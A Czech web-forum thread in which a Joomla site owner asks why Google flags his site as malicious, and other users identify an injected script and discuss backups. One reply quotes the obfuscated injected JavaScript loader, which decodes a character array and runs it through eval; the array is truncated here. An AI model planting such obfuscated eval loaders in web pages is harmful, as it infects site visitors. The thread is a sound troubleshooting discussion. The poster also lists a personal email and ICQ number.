Autor Zpráva
kropovez
Profil
Ahoj všichni,
Moderátor Joker: Zrušil jsem klikatelný odkaz, protože na dané stránce je virus. Zacházejte tedy s odkazem obezřetně.
jsem tu poprvé, protože se mi stal jeden závažný problém. Poslední dobou pokud se chci dostat na svůj web www.kromod.cz mi to hlasí že se jedná o útočný web. Hlásí to google, který tyto stránky zkontroloval. Toto naskakuje až poslední dobou, dříve stránky běhaly normáně. Nevíte jak to spravit? V HTML se moc nevyznám a stránky mi běží pod redakční systémem Joomla.
Děkuji.
Joker
Profil
Viz Máte na webu virus — co s tím?.

Jde o vložený skript hned na začátku stránky.
kropovez
Profil
Můžeš mi to prosím příblížit? Jak ho mám smazat?
Joker
Profil
kropovez:
Můžeš mi to prosím příblížit? Jak ho mám smazat?
1. Kliknout na odkaz co jsem poslal
2. Přečíst si informace
3. Řídit se jimi
kropovez
Profil
No tak jsem skončil u Smažte z infikovaných souborů na serveru škodlivý kód.
Z jakých souborů a jak to tam napsáno není, žádné <iframe> v indexu není
Davex
Profil
kropovez:
Hned na začátek stránky se vkládá nějaký podezřelý skript. Protože používáš Joomlu, tak ho musíš najít v některém souboru na serveru.

<script>try{1-prototype;}catch(asd){x=2;}
if(x){fr="fromChar";f=[4,...,1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;286-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
if(x&&f&&012===10)e(s);</script>
kropovez
Profil
prosím vás, nemohl byste mě nekdo napsat třeba na email nebo icq? Já si pořád nevím rady. Díky.
mlnice@centrum.cz
368246499
kropovez
Profil
Tak jsem zjistil že mám vytvořenou zálohu těch stránek. Teď mi jde o to aby se neztratil obsah. Chci se zeptat jestli se ten obsah náhodou neukládá do MySQL databáze. Díky
panther
Profil
kropovez:
Chci se zeptat jestli se ten obsah náhodou neukládá do MySQL databáze.
jestlize na webu bezi, jak pise Davex, Joomla, obsah v databazi pravdepodobne bude. Neznam ji, nepouzivam, ale je to pravdepodobne.

Neni nic jednodussiho nez se do DB podivat, jestli tam ten obsah je nebo neni, ze?

Vaše odpověď


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm:

0